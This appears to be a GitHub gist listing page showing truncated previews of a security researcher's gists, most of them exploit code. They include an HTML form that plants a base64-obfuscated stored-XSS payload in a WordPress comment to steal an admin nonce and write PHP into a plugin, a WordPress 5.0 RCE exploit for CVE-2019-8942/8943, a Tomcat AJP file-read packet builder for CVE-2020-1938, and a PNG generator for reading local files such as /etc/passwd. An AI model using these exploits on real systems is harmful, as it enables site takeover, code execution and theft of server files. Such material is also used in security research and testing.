Ali allyshka
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <form action="http://wpxss.vh/wp-comments-post.php" method="POST"> | |
| <input type="text" name="comment" value="<a title='xss" style=left:0;top:0;position:fixed;display:block;width:1000%;height:1000% onmousemove=eval(atob("dmFyIGV4cGxvaXQ9ZnVuY3Rpb24oKXt2YXIgbz0iIjtjb25zb2xlLmxvZygiR2V0IG5vbmNlIHRva2VuLiIpLGpRdWVyeS5nZXQoIi93cC1hZG1pbi9wbHVnaW4tZWRpdG9yLnBocD9wbHVnaW49YWtpc21ldC9pbmRleC5waHAmU3VibWl0PVNlbGVjdCIsZnVuY3Rpb24oZSl7aWYobz1qUXVlcnkoZSkuZmluZCgiI3RlbXBsYXRlICNub25jZSIpLnZhbCgpKXtjb25zb2xlLmxvZygiU3VjY2VzcyEgbm9uY2U6ICIrbyk7dmFyIG49e25vbmNlOm8sbmV3Y29udGVudDoiPD9waHAgcGhwaW5mbygpOy8qIixhY3Rpb246ImVkaXQtdGhlbWUtcGx1Z2luLWZpbGUiLGZpbGU6ImFraXNtZXQvaW5kZXgucGhwIixwbHVnaW46ImFraXNtZXQvYWtpc21ldC5waHAiLCJkb2NzLWxpc3QiOiIifTtjb25zb2xlLmxvZygiQWRkIFBIUCBjb2RlIHRvIHBsdWdpbiBmaWxlLiIpLGpRdWVyeS5wb3N0KCIvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAiLG4sZnVuY3Rpb24oZSl7Y29uc29sZS5sb2coIlN1Y2Nlc3MhIiksd2luZG93Lm9wZW4oIi93cC1jb250ZW50L3BsdWdpbnMvYWtpc21ldC8iKX0pfX0pfSxoPWRvY3VtZW50Lmdld |
allyshka
/ script-loader.calls
Created
April 5, 2018 14:46
All add method calls from script-loader.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 070: $scripts->add( 'utils', "/wp-includes/js/utils$suffix.js" ); | |
| ... | |
| 078: $scripts->add( 'common', "/wp-admin/js/common$suffix.js", array('jquery', 'hoverIntent', 'utils'), false, 1 ); | |
| ... | |
| 086: $scripts->add( 'wp-a11y', "/wp-includes/js/wp-a11y$suffix.js", array( 'jquery' ), false, 1 ); | |
| ... | |
| 088: $scripts->add( 'sack', "/wp-includes/js/tw-sack$suffix.js", array(), '1.6.1', 1 ); | |
| ... | |
| 090: $scripts->add( 'quicktags', "/wp-includes/js/quicktags$suffix.js", array(), false, 1 ); | |
| ... |
allyshka
/ enterprisedecrypt.rb
Created
March 20, 2017 13:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/ruby | |
| # | |
| # This tool is only used to "decrypt" the github enterprise source code. | |
| # | |
| # Run in the /data directory of the instance. | |
| require "zlib" | |
| KEY = "This obfuscation is intended to discourage GitHub Enterprise customers "+ | |
| "from making modifications to the VM. We know this 'encryption' is easily broken. " |
allyshka
/ wordpress-rce.js
Created
March 1, 2019 22:51
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var wpnonce = ''; | |
| var ajaxnonce = ''; | |
| var wp_attached_file = ''; | |
| var imgurl = ''; | |
| var postajaxdata = ''; | |
| var post_id = 0; | |
| var cmd = '<?php phpinfo();/*'; | |
| var cmdlen = cmd.length | |
| var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9'; | |
| var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd); |
allyshka
/ ajp-packet.py
Created
March 31, 2020 15:44
AJP packet for testing Tomcat arbitrary file read (CVE-2020-1938)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import struct | |
| def pack_string(s): | |
| if s is None: | |
| return struct.pack(">h", -1) | |
| l = len(s) | |
| return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0) | |
| magic = 0x1234 | |
| prefix_code = struct.pack("b", 2) # forward request |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| display_usage() { | |
| echo "This script check connection to list of URLs with specified host." | |
| echo -e "\nUsage:\n$0 ipsfile hostname\n" | |
| echo -e "\nExample:\n$0 moz-com.list moz.com\n" | |
| } | |
| if [ $# -le 1 ] | |
| then |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import struct | |
| import zlib | |
| import argparse | |
| parser = argparse.ArgumentParser() | |
| parser.add_argument("-s", "--size", type=int, default=256, help="size of an image in px (default: 256)") | |
| parser.add_argument("-f", "--file", type=str, default="/etc/passwd", help="local file to read (default: /etc/passwd)") | |
| parser.add_argument("-o", "--output", type=str, default="expl.png", help="output expoit image name (default: expl.png)") | |
| parser.add_argument("-i", "--input", type=str, help="an image name for parse, if specified then the script only parses the result") |
OlderNewer